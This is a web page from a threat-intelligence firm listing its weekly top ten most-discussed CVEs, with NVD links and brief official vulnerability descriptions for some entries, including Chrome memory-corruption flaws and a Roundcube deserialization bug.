If you are feeling generous please do make us aware of anything you spot, feel free to follow us on Twitter @sosintel and DM us. Thank you!

1. CVE-2016-10033

https://nvd.nist.gov/vuln/detail/CVE-2016-10033

2. CVE-2025-5287

https://nvd.nist.gov/vuln/detail/CVE-2025-5287

3. CVE-2025-5419

Out of bounds read and write in V8 in Google Chrome prior to 137.0.7151.68 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-5419

4. CVE-2025-2783

https://nvd.nist.gov/vuln/detail/CVE-2025-2783

5. CVE-2017-8759

https://nvd.nist.gov/vuln/detail/CVE-2017-8759

6. CVE-2025-49113

Roundcube Webmail before 1.5.10 and 1.6.x before 1.6.11 allows remote code execution by authenticated users because the _from parameter in a URL is not validated in program/actions/settings/upload.php, leading to PHP Object Deserialization.

https://nvd.nist.gov/vuln/detail/CVE-2025-49113

7. CVE-2024-21762

https://nvd.nist.gov/vuln/detail/CVE-2024-21762

8. CVE-2024-10687

https://nvd.nist.gov/vuln/detail/CVE-2024-10687

9. CVE-2024-21060

https://nvd.nist.gov/vuln/detail/CVE-2024-21060

10. CVE-2025-5958

Use after free in Media in Google Chrome prior to 137.0.7151.103 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)

https://nvd.nist.gov/vuln/detail/CVE-2025-5958

Cookie	Duration	Description
cookielawinfo-checkbox-analytics	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Analytics".
cookielawinfo-checkbox-functional	11 months	The cookie is set by GDPR cookie consent to record the user consent for the cookies in the category "Functional".
cookielawinfo-checkbox-necessary	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookies is used to store the user consent for the cookies in the category "Necessary".
cookielawinfo-checkbox-others	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Other.
cookielawinfo-checkbox-performance	11 months	This cookie is set by GDPR Cookie Consent plugin. The cookie is used to store the user consent for the cookies in the category "Performance".
viewed_cookie_policy	11 months	The cookie is set by the GDPR Cookie Consent plugin and is used to store whether or not user has consented to the use of cookies. It does not store any personal data.

The SOS Intelligence CVE Chatter Weekly Top Ten – 18 August 2025

The SOS Intelligence CVE Chatter Weekly Top Ten – 11 August 2025

The SOS Intelligence CVE Chatter Weekly Top Ten – 04 August 2025

The SOS Intelligence CVE Chatter Weekly Top Ten – 28 July 2025

The SOS Intelligence CVE Chatter Weekly Top Ten – 21 July 2025

The SOS Intelligence CVE Chatter Weekly Top Ten – 14 July 2025

The SOS Intelligence CVE Chatter Weekly Top Ten – 07 July 2025

The SOS Intelligence CVE Chatter Weekly Top Ten – 30 June 2025

The SOS Intelligence CVE Chatter Weekly Top Ten – 23 June 2025

The SOS Intelligence CVE Chatter Weekly Top Ten – 16 June 2025

Recent Posts

Recent Comments

CVE intelligence

Recent Posts

Recent Comments